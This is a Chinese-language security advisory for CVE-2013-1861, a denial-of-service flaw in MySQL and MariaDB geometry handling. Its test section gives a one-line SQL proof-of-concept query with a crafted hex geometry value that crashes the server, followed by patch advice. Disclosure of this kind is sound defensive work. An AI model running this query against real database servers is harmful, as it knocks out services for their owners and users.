MySQL 和 MariaDB Geometry 查询拒绝服务漏洞

漏洞描述:

BUGTRAQ  ID: 58511
CVE(CAN) ID: CVE-2013-1861

Oracle MySQL Server是一个小型关系型数据库管理系统。MariaDB 是一个采用Maria存储引擎的MySQL分支版本，是免费开源的数据库服务器。

MySQL和MariaDB在转换原始geometry对象的二进制字符串表达式为文本表达式时，MySQL的空间函数长度检查会产生溢出，造成应用崩溃。

<* 参考

https://bugzilla.redhat.com/show_bug.cgi?id=919247 
http://seclists.org/oss-sec/2013/q1/671

*>

测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

1. &quot;select astext(0x0100000000030000000100000000000010);&quot;

安全建议:

厂商补丁：

MySQL AB
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.mysql.com/